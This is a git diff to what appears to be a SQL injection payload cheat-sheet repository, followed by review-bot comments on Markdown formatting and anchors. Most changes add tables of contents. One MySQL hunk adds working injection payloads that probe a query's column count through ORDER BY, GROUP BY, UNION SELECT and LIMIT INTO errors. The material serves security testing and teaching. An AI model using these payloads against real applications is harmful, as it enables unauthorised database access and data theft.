diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index e66949e..2396618 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -2,6 +2,14 @@ > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system +## Summary + +* [Cassandra comment](#cassandra-comment) +* [Cassandra - Login Bypass](#cassandra---login-bypass) + * [Login Bypass 0](#login-bypass-0) + * [Login Bypass 1](#login-bypass-1) +* [References](#references) + ## Cassandra comment ```sql @@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h ## References -* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 0086f10..6e8168b 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,6 +1,12 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia +## Summary + +* [HQL Comments](#hql-comments) +* [HQL List Columns](#hql-list-columns) +* [HQL Error Based](#hql-error-based) +* [References](#references) ## HQL Comments 
@@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) \ No newline at end of file +* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index fa30aa6..0e79365 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
@@ -5,18 +5,18 @@ * [MSSQL comments](#mssql-comments) * [MSSQL version](#mssql-version) * [MSSQL database name](#mssql-database-name) -* [MSSQL List databases](#mssql-list-database) +* [MSSQL List databases](#mssql-list-databases) * [MSSQL List columns](#mssql-list-columns) * [MSSQL List tables](#mssql-list-tables) -* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Extract user/password](#mssql-extract-userpassword) * [MSSQL Union Based](#mssql-union-based) * [MSSQL Error Based](#mssql-error-based) * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) -* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Stacked query](#mssql-stacked-query) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) -* [MSSQL Make user DBA](#mssql-make-user-dba) +* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) ## MSSQL comments diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index f61cc52..9dd034c 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -3,10 +3,10 @@ ## Summary * [MYSQL Comment](#mysql-comment) -* [Detect columns number](#detect-columns-number) * [MYSQL Union Based](#mysql-union-based) - * [Extract database with information_schema](#extract-database-with-information-schema) - * [Extract data without information_schema](#extract-data-without-information-schema) + * [Detect columns number](#detect-columns-number) + * [Extract database with information_schema](#extract-database-with-information_schema) + * [Extract columns name without information_schema](#extract-columns-name-without-information_schema) * [Extract data without columns name](#extract-data-without-columns-name) * [MYSQL Error Based](#mysql-error-based) * [MYSQL Error Based - Basic](#mysql-error-based---basic) 
@@ -15,10 +15,10 @@ * [MYSQL Blind](#mysql-blind) * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) - * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) - * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using SLEEP in a subselect](#using-sleep-in-a-subselect) * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) 
@@ -46,17 +46,76 @@ ## MYSQL Union Based -### Extract database with information_schema +### Detect columns number -First you need to know the number of columns, you can use `order by`. +First you need to know the number of columns + +##### Using `order by` or `group by` + +Keep incrementing the number until you get a False response. +Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query. ```sql -order by 1 -order by 2 -order by 3 -... -order by XXX +1' ORDER BY 1--+ #True +1' ORDER BY 2--+ #True +1' ORDER BY 3--+ #True +1' ORDER BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True ``` +or +```sql +1' GROUP BY 1--+ #True +1' GROUP BY 2--+ #True +1' GROUP BY 3--+ #True +1' GROUP BY 4--+ #False - Query is only using 3 columns + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `order by` or `group by` Error Based +Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled. 
+```sql +1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'order clause' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +or +```sql +1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ + +# Unknown column '4' in 'group statement' +# This error means query uses 3 column +#-1' UNION SELECT 1,2,3--+ True +``` +##### Using `UNION SELECT` Error Based +This method works if error showing is enabled +```sql +1' UNION SELECT @--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns +1' UNION SELECT @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `LIMIT INTO` Error Based +This method works if error showing is enabled. + +It is useful for finding the number of columns when the injection point is after a LIMIT clause. +```sql +1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns +1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based +This works if you know the table name you're after and error showing is enabled. + +It will return the amount of columns in the table, not the query. 
+ +```sql +1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s) + # This error means query uses 3 column + #-1' UNION SELECT 1,2,3--+ True +``` +### Extract database with information_schema Then the following codes will extract the databases'name, tables'name, columns'name. diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 0228cd9..633e24c 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,18 @@ # Oracle SQL Injection +## Summary + +* [Oracle SQL version](#oracle-sql-version) +* [Oracle SQL database name](#oracle-sql-database-name) +* [Oracle SQL List databases](#oracle-sql-list-databases) +* [Oracle SQL List columns](#oracle-sql-list-columns) +* [Oracle SQL List tables](#oracle-sql-list-tables) +* [Oracle SQL Error Based](#oracle-sql-error-based) +* [Oracle SQL Blind](#oracle-sql-blind) +* [Oracle SQL Time Based](#oracle-sql-time-based) +* [Oracle SQL Command execution](#oracle-sql-command-execution) +* [References](#references) + ## Oracle SQL version ```sql @@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL; SELECT DISTINCT owner FROM all_tables; ``` -## Oracle SQL List Column +## Oracle SQL List Columns ```sql SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 2bf952c..00bbbf4 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -20,8 +20,8 @@ * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) - * [CVE-2019–9193](#cve-2019–9193) - * [Using libc.so.6](#using-libc-so-6) + * [CVE-2019–9193](#cve-20199193) + * [Using libc.so.6](#using-libcso6) * [References](#references) ## PostgreSQL Comments diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 8d5162b..25b035e 100644 
--- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including: * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) + * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) @@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) + * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 0631c0b..428e806 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md 
@@ -1,5 +1,18 @@ # SQLite Injection +## Summary + +* [SQLite comments](#sqlite-comments) +* [SQLite version](#sqlite-version) +* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) +* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) +* [Boolean - Count number of tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating table name](#boolean---enumerating-table-name) +* [Boolean - Extract info](#boolean---extract-info) +* [Time based](#time-based) +* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) +* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) +* [References](#references) ## SQLite comments ```sql
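Review bot: In the `HQL Injection.md` Summary hunk, the new `* [References](#references)` item runs straight into the existing `## HQL Comments` heading with no blank line between them; some Markdown renderers will not terminate the list or recognise the heading without it. Add an empty `+` line after the last list item, as the Cassandra and Oracle Summary hunks in this same patch already do.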
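Review bot: In the `MSSQL Injection.md` hunk, the changed anchor `#mssql-make-user-dba-db-admin` points at a heading that is not shown in the diff, so it cannot be verified from the patch alone; please confirm the target heading reads exactly "MSSQL Make user DBA (DB admin)" (lowercased, punctuation dropped, spaces to hyphens is how the slug is derived), otherwise this link will be as broken as the one it replaces. The other three anchor fixes in this hunk (`#mssql-list-databases`, `#mssql-extract-userpassword`, `#mssql-stacked-query`) are consistent with their visible link text.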
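Review bot: In the large `MySQL Injection.md` hunk adding "Detect columns number", the final code block's comment `# This error means query uses 3 column` contradicts the sentence just above it ("It will return the amount of columns in the table, not the query"): the `Operand should contain 3 column(s)` error reflects the column count of `Users`, so the comment should say the table has 3 columns, or be dropped. Three smaller points in the same hunk: the new `##### Using ...` headings sit directly under a `###` heading, skipping `####` (use `####` so the document outline stays consistent); `funcionality` should be `functionality`; and several closing ```` ``` ```` fences are immediately followed by a heading or by `or` with no blank line, which will render poorly in some Markdown engines.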
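Review bot: In the `PostgreSQL Injection.md` hunk, the link text `CVE-2019–9193` contains a typographic en dash rather than a plain hyphen, and the new anchor `#cve-20199193` has been adjusted to accommodate it. A CVE identifier should use an ASCII hyphen; fixing the heading and list item to `CVE-2019-9193` and pointing the anchor at `#cve-2019-9193` is the better change, since it also makes the identifier searchable and copy-pasteable.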
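Review bot: In the `SQLite Injection.md` Summary hunk, the last list item `* [References](#references)` is followed immediately by the unchanged `## SQLite comments` heading with no blank line; add an empty `+` line after the list so the heading is reliably parsed as a heading rather than list continuation text.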